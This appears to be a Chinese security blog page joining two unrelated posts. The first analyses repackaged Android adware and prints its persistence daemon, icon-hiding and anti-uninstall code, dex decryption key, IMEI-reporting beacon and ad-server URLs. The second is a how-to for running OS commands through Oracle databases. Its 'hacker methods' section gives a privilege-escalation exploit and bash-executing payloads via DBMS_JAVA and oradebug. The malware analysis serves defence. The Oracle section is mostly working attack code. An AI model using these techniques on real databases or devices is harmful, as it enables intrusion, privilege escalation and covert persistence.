                    05:32:21:23:c1:13:78:b0:72:08:19:8e:5e:c0:a0:
                    13:11:19:d6:23:8a:b6:44:2b:73:e0:1d:f3:b3:f4:
                    ab:6c:2e:af:78:2f:8b:e2:dc:b0:d6:06:af:8e:3f:
                    29:54:1a:59:44:55:73:98:2f:fd:8b:18:b0:de:c6:
                    9c:ee:0c:c7:f7:04:9d:0c:a7:62:06:45:4f:08:20:
                    2e:ca:a9:20:88:0e:08:2b:f1:9c:a9:24:5d:35:85:
                    02:bb:c0:ff:37:98:4b:c7:6f:f2:75:81:43:78:f8:
                    4b:cc:63:8c:f5:0e:c9:95:05:3d:ee:a1:85:cd:94:
                    97:b8:48:93:02:b3:71:6e:fb:39:6f:63:5d:a7:24:
                    c1:dc:77:a9:9c:de:5d:76:63:a8:ad:1d:e9:d6:84:
                    9b:ee:8d:37:38:4b:7c:ff:94:c9:df:dd:17:80:8c:
                    e8:d1:94:5d:05:dc:ef:d8:dc:90:4c:8b:75:22:6d:
                    57:6e:ee:4c:5f:62:96:5c:72:64:a4:5b:0f:29:e0:
                    f3:31:11:99:6a:b4:e5:6c:16:4d:8a:44:46:06:8f:
                    06:05
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Subject Key Identifier: 
                A6:8F:86:BB:A7:0A:DB:29:2E:E9:26:A6:F1:8C:BF:2F:4B:58:99:39
    Signature Algorithm: sha256WithRSAEncryption
         82:62:98:a8:39:10:3b:f5:09:42:97:de:e9:4c:57:6c:4e:58:
         a3:1a:31:29:a4:79:98:3f:c9:68:3c:e5:90:be:7f:b0:98:2b:
         8f:95:9e:4e:d2:bc:82:6e:bf:32:56:35:87:c8:19:08:ae:af:
         9c:db:94:71:d4:db:73:d9:25:e2:e5:f1:92:a0:a4:c4:bd:27:
         21:b2:c8:ec:e2:2a:c3:bb:a2:85:97:78:2b:4a:94:cc:fc:dc:
         75:6a:11:c8:ba:da:30:be:11:e9:e7:4a:5e:e1:ae:af:4d:36:
         14:69:31:ab:68:16:69:ed:a8:bb:c7:be:bf:8b:ca:4c:01:d0:
         7e:65:45:31:72:0f:7b:8d:7e:76:40:86:45:8d:ee:a3:b2:ee:
         ac:d3:0e:60:29:b0:fd:dc:8c:6a:25:06:01:99:81:96:f5:4c:
         1d:1a:1d:dc:0e:4b:66:15:80:e8:f5:1c:cd:98:60:71:08:de:
         f9:4f:69:b0:22:ec:05:18:6b:cd:5a:05:ce:3a:fe:57:4b:e7:
         8b:64:b4:f7:4a:cd:63:c1:03:01:e2:b0:aa:81:2d:89:e1:4d:
         da:fb:8f:b9:37:02:ad:85:64:de:87:73:1a:7a:36:50:3f:e6:
         9a:73:65:a0:33:af:81:c6:c8:55:89:e6:a8:03:6a:c6:da:f0:
         a5:cc:1c:6e

样本通过apktool重打包激情浏览器,引诱下载达到感染的目的。样本安装后启动两个服务常驻手机,
通过广告来获得经济收益,安装应用后访问以下链接:

1
2
3
4
5
6
http://dw.cnscns.com/upload/adIcon/2015-10-07/55c01eff-e66a-4186-9658-977d025c5395.png
http://dw.cnscns.com/upload/adOnline/2015-10-07/db90fe85-dd23-4674-9bbc-767c978acb8c.jpg
http://dw.cnscns.com/upload/adIcon/2015-09-06/eccb1bfd-7c3a-44a3-bfc8-e559eb995b49.png
http://dw.cnscns.com/upload/adOnline/2015-09-06/2cd2516c-6f55-4d99-8913-e121fd34abbd.jpg
http://dw.cnscns.com/upload/adIcon/2015-06-18/a7a41435-51e6-4a02-8bb5-1d96edf1a403.png
http://dw.cnscns.com/upload/adOnline/2015-09-19/2e3fe3ec-8043-4a03-ac6d-6b815dc2c144.jpg

http://dw.cnscns.com 是一个移动广告平台。

分析

关键的地方是两个service和一个Receiver

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<service android:name="net.tend.dot.DZS" />
<service android:exported="true" android:name="net.tend.dot.DZK" android:process=":daemon" />
<activity android:configChanges="keyboard|keyboardHidden|orientation|screenSize" android:excludeFromRecents="true" android:launchMode="singleInstance" android:name="net.tend.dot.DZA" android:theme="@android:style/Theme.Translucent.NoTitleBar" />
<receiver android:name="net.tend.dot.DZR">
<intent-filter>
    <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
    <action android:name="android.intent.action.USER_PRESENT" />
    <action android:name="com.dz.downloadmanager" />
    <action android:name="action.dz.start" />
</intent-filter>
<intent-filter>
    <action android:name="android.intent.action.PACKAGE_ADDED" />
    <action android:name="android.intent.action.PACKAGE_REMOVED" />
    <data android:scheme="package" />
</intent-filter>
</receiver>

但是这两个Service和Receiver的代码并不在App代码中,而是在动态加载的dex中,其中的对于关系如下:

  • net.tend.dot.DZS -> mkit.dz.vol.MFSS
  • net.tend.dot.DZK -> mkit.dz.vol.MFKS
  • net.tend.dot.DZR -> mkit.dz.vol.MFBR
  • net.tent.dot.DZA -> mkit.dz.vol.MFAC

而动态加载的dex 由 assets/dzsm 解密而来。样本的文件转换图如下:

assets/dzsm 使用DES加密,文件的前32个字节为key,后面的为加密的内容,可以使用下面的java代码进行
解密。解密出来的文件为dex文件,可以用jeb正常分析。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import javax.crypto.Cipher;
import javax.crypto.CipherInputStream;
import javax.crypto.CipherOutputStream;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.DESKeySpec;
public class decrypt {
    public static void main(String[] args) {
        try {
            String key = "8q6e81ssaiem1msqii9ixasmumsxxxqq";
            FileInputStream fis2 = new FileInputStream("/tmp/dzsm");
            FileOutputStream fos2 = new FileOutputStream("decrypted");
            decrypt(key, fis2, fos2);
        } catch (Throwable e) {
            e.printStackTrace();
        }
    }
    public static void encrypt(String key, InputStream is, OutputStream os) throws Throwable {
        encryptOrDecrypt(key, Cipher.ENCRYPT_MODE, is, os);
    }
    public static void decrypt(String key, InputStream is, OutputStream os) throws Throwable {
        encryptOrDecrypt(key, Cipher.DECRYPT_MODE, is, os);
    }
    public static void encryptOrDecrypt(String key, int mode, InputStream is, OutputStream os) throws Throwable {
        DESKeySpec dks = new DESKeySpec(key.getBytes());
        SecretKeyFactory skf = SecretKeyFactory.getInstance("DES");
        SecretKey desKey = skf.generateSecret(dks);
        Cipher cipher = Cipher.getInstance("DES");
        if (mode == Cipher.ENCRYPT_MODE) {
            cipher.init(Cipher.ENCRYPT_MODE, desKey);
            CipherInputStream cis = new CipherInputStream(is, cipher);
            doCopy(cis, os);
        } else if (mode == Cipher.DECRYPT_MODE) {
            cipher.init(Cipher.DECRYPT_MODE, desKey);
            CipherOutputStream cos = new CipherOutputStream(os, cipher);
            doCopy(is, cos);
        }
    }
    public static void doCopy(InputStream is, OutputStream os) throws IOException {
        byte[] bytes = new byte[64];
        int numBytes;
        while ((numBytes = is.read(bytes)) != -1) {
            os.write(bytes, 0, numBytes);
        }
        os.flush();
        os.close();
        is.close();
    }
}

MainActivity是 com.dz.browser.WelActivity

1
2
3
4
5
6
7
8
<activity android:icon="@drawable/icon1"
          android:label="@string/main_name"
          android:name="com.dz.browser.WelActivity" android:screenOrientation="portrait">
    <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
    </intent-filter>
</activity>

WelActivity 里干几件事:

1) 隐藏图标

1
2
3
4
5
6
private void setComponentEnabled(Context context, Class arg6, boolean enabled) {
    ComponentName v0 = new ComponentName(context, arg6.getName());
    PackageManager v3 = context.getPackageManager();
    int v1 = enabled ? 1 : 2;
    v3.setComponentEnabledSetting(v0, v1, 1);
}

2) 动态加载dex

1
2
3
4
5
6
7
8
9
10
private void GoMain() {
    new Handler().postDelayed(new Runnable() {
        public void run() {
            WelActivity.this.setComponentEnabled(WelActivity.this, WelActivity.class, false);
        }
    }, 5000);
    Intent v0 = new Intent();
    v0.setClass(((Context)this), GuideActivity.class);
    this.startActivity(v0);
}

GuideActivity 的 onCreate 调用 DZM.getInstance(((Context)this)).init(); 加载 dex。
GuideActivity 同时向广告服务器发送本机信息

1
2
3
4
5
6
7
8
9
10
11
new Thread(new Runnable() {
    public void run() {
        try {
            Log.i("ads", "==" + HttpUtils.post(String.valueOf(Constant.reportUrl) + Utils.getQID(
                    GuideActivity.this), GuideActivity.this.Params.reqparams()));
        }
        catch(PackageManager$NameNotFoundException v1) {
            v1.printStackTrace();
        }
    }
}).start();

http://mob.s2s.nooobi.com/api-mobvista/sdkback%3Fappkey%3DSexTubeMobvista1

1
2
3
4
5
6
7
8
POST /api-mobvista/sdkback?appkey=SexTubeMobvista1 HTTP/1.1
Content-Length: 59
Content-Type: application/x-www-form-urlencoded
Host: mob.s2s.nooobi.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
country=CN&ip=220.231.27.156&model=sdk&imei=000000000000000

同时加载dex还有另外一个入口,通过 Receiver

1
2
3
4
5
6
7
8
9
10
11
12
13
<receiver android:name="net.tend.dot.DZR">
    <intent-filter>
        <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
        <action android:name="android.intent.action.USER_PRESENT" />
        <action android:name="com.dz.downloadmanager" />
        <action android:name="action.dz.start" />
    </intent-filter>
    <intent-filter>
        <action android:name="android.intent.action.PACKAGE_ADDED" />
        <action android:name="android.intent.action.PACKAGE_REMOVED" />
        <data android:scheme="package" />
    </intent-filter>
</receiver>

当网络变化,用户锁屏等操作时将自动加载dex

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
public class DZR extends BroadcastReceiver {
    public DZR() {
        super();
    }
    private void a(Context context, Intent intent) {
        try {
            a.a(context, i.class).onReceive(context, intent);
        }
        catch(Exception v0) {
            Log.e("ads", "", ((Throwable)v0));
        }
    }
    public void onReceive(Context context, Intent intent) {
        Context context = context.getApplicationContext();
        String action = intent.getAction();
        System.out.println("SV=" + dzm_version.DZM_1_2_5);
        if(action.equals("android.intent.action.USER_PRESENT")) {
            DZM.getInstance(context);
        }
        l.start_thread(context);
        if(l.str_dzmb_kiup_act().equals(action)) {
            l.loadDex(context, intent);
        }
        else {
            this.a(context, intent);
        }
    }
}
1
2
3
4
5
6
<receiver android:name="com.dz.browser.MyReceiver">
<meta-data android:name="android.app.device_admin" android:resource="@xml/lockourscreen" />
<intent-filter>
    <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
</intent-filter>
</receiver>

lockourscreen.xml 里申请了锁屏权限

1
2
3
4
5
<device-admin xmlns:android="http://schemas.android.com/apk/res/android">
    <uses-policies>
        <force-lock />
    </uses-policies>
</device-admin>

但是Receiver里什么也没有干,这只是为了阻止普通用户卸载app。

样本会访问下面URL 获得ip地址信息

http://ip.taobao.com/service/getIpInfo2.php?ip=myip

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
{
code: 0,
data: {
country: "中国",
country_id: "CN",
area: "华北",
area_id: "100000",
region: "北京市",
region_id: "110000",
city: "北京市",
city_id: "110100",
county: "",
county_id: "-1",
isp: "华瑞信通",
isp_id: "1000146",
ip: "220.231.27.156"
}
}

从分析看样本主要是获取广告,下载apk,安装apk 这几个功能,还可以使用浏览器打开指定URL

daemon 分析

两个服务中,daemon 是 arm elf 可执行文件,app安装后自动执行。daemon程序由 dz.jar 的 assets/oilive 释放出来。
在手机上得到下面的命令行

1
/data/data/org.dz.passion.browser/app_bin/daemon -p org.dz.passion.browser -s net.tend.dot.DZK -t 120

daemon 使用说明

usage: %s -p package-name -s daemon-service-name -t interval-time

daemon 进程的父进程是init,结束应用进程不会结束daemon进程,将应用进程结束后过120秒,daemon将会重新自动启动
服务程序。

1
2
3
u0_a45    999   36    193564 32452 ffffffff 40033a40 S org.dz.passion.browser:daemon
u0_a45    1016  36    192640 35772 ffffffff 40033a40 S org.dz.passion.browser
u0_a45    1028  1     728    296   c0099f1c 40032c88 S /data/data/org.dz.passion.browser/app_bin/daemon

这个搞法似类以前的双进程监控,不容易干掉,上面说过启动App就启动两个服务 DZS 和 DZK,而DZK的代码其实在MFKS中,
从下面的代码可以看到,MFKS在Service 的 OnCreate 是就把daemon 运行起来了,daemon 又会检查app的服务的状态,有会自动
启动服务,比较流氓啊!这么做目的还是为了常驻手机,长期运行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
public class MFKS {
    private Service service;
    public MFKS() {
        super();
    }
    public IBinder onBind(Intent arg2) {
        return null;
    }
    public void onCreate() {
        run_daemon.install(this.service.getApplicationContext(), config.get_kvp_classObject(this.service  // net.tend.dot.DZK
                .getApplicationContext()), 120);
        this.service.startService(new Intent(this.service.getApplicationContext(), config.get_svp_classObject(  // net.tend.dot.DZS
                this.service.getApplicationContext())));
    }
    public void onStart(Intent arg1, int arg2) {
    }
    public void setService(Service arg1) {
        this.service = arg1;
    }
}

附录

访问的URL

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
http://ip.taobao.com/service/getIpInfo2.php%3Fip%3Dmyip
http://api.nooobi.com/api-unlock/getlockappconfig
http://api.nooobi.com/api-unlock/insertimei
http://mob.s2s.nooobi.com/api-mobvista/sdkback%3Fappkey%3DSexTubeMobvista1
http://api.nooobi.com/api-unlock/getapptype
http://api.nooobi.com/api-unlock/kitup
http://alog.umeng.com/app_logs
http://api.nooobi.com/api-unlock/getadlist
http://dw.cnscns.com/upload/adIcon/2015-10-07/55c01eff-e66a-4186-9658-977d025c5395.png
http://dw.cnscns.com/upload/adOnline/2015-10-07/db90fe85-dd23-4674-9bbc-767c978acb8c.jpg
http://dw.cnscns.com/upload/adIcon/2015-09-06/eccb1bfd-7c3a-44a3-bfc8-e559eb995b49.png
http://dw.cnscns.com/upload/adOnline/2015-09-06/2cd2516c-6f55-4d99-8913-e121fd34abbd.jpg
http://dw.cnscns.com/upload/adIcon/2015-06-18/a7a41435-51e6-4a02-8bb5-1d96edf1a403.png
http://dw.cnscns.com/upload/adOnline/2015-09-19/2e3fe3ec-8043-4a03-ac6d-6b815dc2c144.jpg
http://api.nooobi.com/api-unlock/unlockaction

总结

DZSM 这个样本使用了动态加载dex的技术,使得其检测更加困难。代码结构良好,异常处理充分,
是一个专业程序员的作品。使用了简单的加密技术,也是为了逃避检查。

发表于

1. 正统方法

1.1 使用JAVA

1.1.1 代码

Oracle 数据库都支持Java,可以利用java来实现我们需要的功能。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS
import java.lang.*;
import java.io.*;
public class JAVACMD
{
 public static void execCommand (String command) throws IOException
 {
    try {
        String[] finalCommand;
        if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) {
            finalCommand = new String[4];
            finalCommand[0] = "C:\\windows\\system32\\cmd.exe";
            finalCommand[1] = "/y";
            finalCommand[2] = "/c";
            finalCommand[3] = command;
        } else {
            finalCommand = new String[3];
            finalCommand[0] = "/bin/sh";
            finalCommand[1] = "-c";
            finalCommand[2] = command;
        }
        Process p = Runtime.getRuntime().exec(finalCommand);
        if (p.waitFor() != 0) {
            if (p.exitValue() == 1)
               System.err.println("command execute failed.");
        }
        BufferedInputStream in = new BufferedInputStream(p.getInputStream());
        BufferedReader inBr = new BufferedReader(new InputStreamReader(in));
        String lineStr;
        while ((lineStr = inBr.readLine()) != null)
            System.out.println(lineStr);
        inBr.close();
        in.close();
    } catch (Exception e) {
        e.printStackTrace();
    } 
 }
};
/
CREATE OR REPLACE PROCEDURE JAVACMDPROC (p_command IN VARCHAR2)
AS LANGUAGE JAVA
NAME 'JAVACMD.execCommand (java.lang.String)';
/

1.1.2 设置输出

1
2
set serveroutput on size 100000;
exec dbms_java.set_output(100000);

1.1.3 需要的权限

可以使用下面的语句查询相关权限

  • 用户权限
1
select * from session_privs;
  • JAVA 权限
1
2
select * from dba_java_policy;
select * from user_java_policy;

使用java代码执行系统命令需要的权限,可以使用下面语句进行授权:

1
2
3
exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<<ALL FILES>>','execute');
exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');

1.1.4 实验结果

非常不错支持回显。

1
2
3
4
5
SQL> exec javacmdproc('/bin/uname -a');
Linux localhost.localdomain 2.6.32-100.34.1.el6uek.i686 #1 SMP Wed May 25
17:28:36 EDT 2011 i686 i686 i386 GNU/Linux
PL/SQL procedure successfully completed.

1.1.5 注意

需要使用全路径

1.2 DBMS_SCHEDULAR

1.2.1 DBMS_SCHEDULAR 简介

这个和Windows上的计划任务类似。

1.2.2 需要的权限

  1. CREATE JOB
  2. CREATE EXTERNAL JOB
  3. EXECUTE on dbms_scheduler (granted to public by default)

grant create job, create external job to scott ;

1.2.3 执行的语句

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
BEGIN
DBMS_SCHEDULER.CREATE_PROGRAM (
program_name=> 'MyCmd',
program_type=> 'EXECUTABLE',
-- Use the ampersand to break out
program_action => '/tmp/a.sh',
enabled=> TRUE,
comments=> 'Run a command using shell metacharacters.'
 );
END;
/
BEGIN
DBMS_SCHEDULER.CREATE_JOB (
   job_name=> 'X',
   program_name=> 'MyCmd',
   repeat_interval=> 'FREQ=SECONDLY;INTERVAL=10',
   enabled=> TRUE,
   comments=> 'Every 10 seconds');
END;
/
exec DBMS_SCHEDULER.RUN_JOB ( job_name=> 'X');

1.2.4 注意

  1. 原先使用 || 等 metacharacters 的bug已经修复,只能使用参数
  2. Windows系统必须开启OracleJobSchedulerSID 服务
  3. Linux系统上相关文件的权限必须正确
  4. 高版本的Linux,执行的group已经被Oracle将为nobody

总之这个方法局限行很大,不推荐使用,列在这里只是做一个备忘。

1.3 使用oradebug

  • oradebug 简介
    oradebug是一个神奇的命令, 能干很多活, 但是Oracle却很少提及,属于undocumented
    状态,是给oracle的工程师使用的,主要用于调试和性能调优。可以使用 oradebug help
    命令,查看oradebug的用法
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
SQL> oradebug help
HELP           [command]                 Describe one or all commands
SETMYPID                                 Debug current process
SETOSPID       <ospid>                   Set OS pid of process to debug
SETORAPID      <orapid> ['force']        Set Oracle pid of process to debug
SETORAPNAME    <orapname>                Set Oracle process name to debug
SHORT_STACK                              Get abridged OS stack
CURRENT_SQL                              Get current SQL
DUMP           <dump_name> <lvl> [addr]  Invoke named dump
DUMPSGA        [bytes]                   Dump fixed SGA
DUMPLIST                                 Print a list of available dumps
EVENT          <text>                    Set trace event in process
SESSION_EVENT  <text>                    Set trace event in session
DUMPVAR        <p|s|uga> <name> [level]  Print/dump a fixed PGA/SGA/UGA variable
DUMPTYPE       <address> <type> <count>  Print/dump an address with type info
SETVAR         <p|s|uga> <name> <value>  Modify a fixed PGA/SGA/UGA variable
PEEK           <addr> <len> [level]      Print/Dump memory
POKE           <addr> <len> <value>      Modify memory
WAKEUP         <orapid>                  Wake up Oracle process
SUSPEND                                  Suspend execution
RESUME                                   Resume execution
FLUSH                                    Flush pending writes to trace file
CLOSE_TRACE                              Close trace file
TRACEFILE_NAME                           Get name of trace file
LKDEBUG                                  Invoke global enqueue service debugger
NSDBX                                    Invoke CGS name-service debugger
-G             <Inst-List | def | all>   Parallel oradebug command prefix
-R             <Inst-List | def | all>   Parallel oradebug prefix (return output
SETINST        <instance# .. | all>      Set instance list in double quotes
SGATOFILE      <SGA dump dir>         Dump SGA to file; dirname in double quotes
DMPCOWSGA      <SGA dump dir> Dump & map SGA as COW; dirname in double quotes
MAPCOWSGA      <SGA dump dir>         Map SGA as COW; dirname in double quotes
HANGANALYZE    [level] [syslevel]        Analyze system hang
FFBEGIN                                  Flash Freeze the Instance
FFDEREGISTER                             FF deregister instance from cluster
FFTERMINST                               Call exit and terminate instance
FFRESUMEINST                             Resume the flash frozen instance
FFSTATUS                                 Flash freeze status of instance
SKDSTTPCS      <ifname>  <ofname>        Helps translate PCs to names
WATCH          <address> <len> <self|exist|all|target>  Watch a region of memory
DELETE         <local|global|target> watchpoint <id>    Delete a watchpoint
SHOW           <local|global|target> watchpoints        Show  watchpoints
DIRECT_ACCESS  <set/enable/disable command | select query> Fixed table access
CORE                                     Dump core without crashing process
IPC                                      Dump ipc information
UNLIMIT                                  Unlimit the size of the trace file
PROCSTAT                                 Dump process statistics
CALL           [-t count] <func> [arg1]...[argn]  Invoke function with arguments

功能非常丰富, 下面我们用到的是 CALL 可以直接调用oracle进程使用的函数。

执行的语句

oradebug setmypid; oradebug call system "/usr/bin/whoami >/tmp/ret";

注意

  1. 这里权限要求是SYSDBA
  2. 双引号里必须是使用TAB而不能使用空格
  3. Linux 和 Windows 下的ORACLE都能利用成功

2. 黑客方法

下面用到的两个方法是David Litchfield 在Blackhat DC 2010 上公开两个方法,通过逆向
发现。结合DBMS_JVM_EXP_PERMS的漏洞可以直接执行系统命令(DBMS_JVM_EXP_PERMS 漏洞
已经被被修复)

1
2
3
4
5
6
7
8
9
10
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,'java.io.FilePermission’,’<<ALL FILES>>‘,’execute’,'ENABLED’ from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

在有漏洞的DBMS_JVM_EXP_PERMS package的Oracle上执行上述语句,有create session
权限的用户可以给自己授权所有java 权限。

2.1 DBMS_JAVA_TEST.FUNCALL

2.1.1 执行的语句

1
Select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','/bin/ls>/tmp/OUT2.LST') from dual;

2.1.2 需要的权限

1
exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<<ALL FILES>>','execute');

2.1.3 受影响系统

11g R1, 11g R2

2.2 DBMS_JAVA.RUNJAVA

2.2.1 执行的语句

1
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c /bin/ls>/tmp/OUT.LST') FROM DUAL;

2.2.2 需要的权限

1
exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<<ALL FILES>>','execute');

2.2.3 受影响系统

10g R2, 11g R1, 11g R2

参考链接

  1. Using Java to run os command
  2. DBMS_SCHEDULER
  3. oradebug
  4. BlackHat-DC-2010-Litchfield-Oracle11g
  5. Hacking Oracle from the Web